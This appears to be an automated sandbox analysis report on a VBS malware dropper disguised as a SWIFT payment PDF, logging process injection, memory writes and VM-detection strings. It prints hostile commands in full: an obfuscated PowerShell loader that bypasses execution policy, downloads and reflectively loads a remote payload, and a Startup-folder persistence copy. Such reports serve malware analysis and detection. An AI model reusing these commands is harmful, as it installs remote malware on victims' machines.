            Source: svchost.exe, 00000017.00000002.2503882449.0000000002E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:s
            Source: svchost.exe, 0000002C.00000002.2772019643.0000000002C79000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#
            Source: SWIFT 103 202406111301435660 110624-pdf.vbsBinary or memory string: AikBZKNiiaecplqiKNpKWiKhNGzfUGnKfucgSaRZtnWlobtLLmiLoLPdLCJPiZTWqcRe = "ehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqiloo"
            Source: svchost.exe, 0000000E.00000002.3370131145.000001C4FB256000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3370036548.000001C4FB241000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000056.00000002.3364421731.000000000363F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: svchost.exe, 00000056.00000002.3364421731.000000000363F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: wscript.exe, 00000000.00000003.2053306719.0000022448D24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqiloo
            Source: svchost.exe, 00000025.00000002.2697086161.0000000003240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: svchost.exe, 0000000E.00000002.3367619122.000001C4F5C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.2054228773.0000022448B33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DehKiAltTWegWGALbNmWxlGKicoNaLhLSfkgPvmCicLWJRKWZiqxKUhLKLkhLKKLqilooPxLaop
            Source: powershell.exe, 00000008.00000002.2431197245.00000180F0CE9000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end nodegraph_10-47555
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004327AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041A8DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004407B5 mov eax, dword ptr fs:[00000030h]10_2_004407B5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,10_2_00410763
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004327AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004328FC SetUnhandledExceptionFilter,10_2_004328FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_004398AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00432D5C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Bypasses PowerShell execution policy
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Contains functionality to inject code into remote processes
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041642D GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,10_2_0041642D
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 456000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 46E000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 474000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 475000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 100E008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BAB008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 263B008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2875008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 295A008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C9A008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 29AB008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2721008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F1E008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2970008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2B7C008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 293B008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D9C008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3086008Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_2_00410B5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_004175E1 mouse_event,10_2_004175E1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
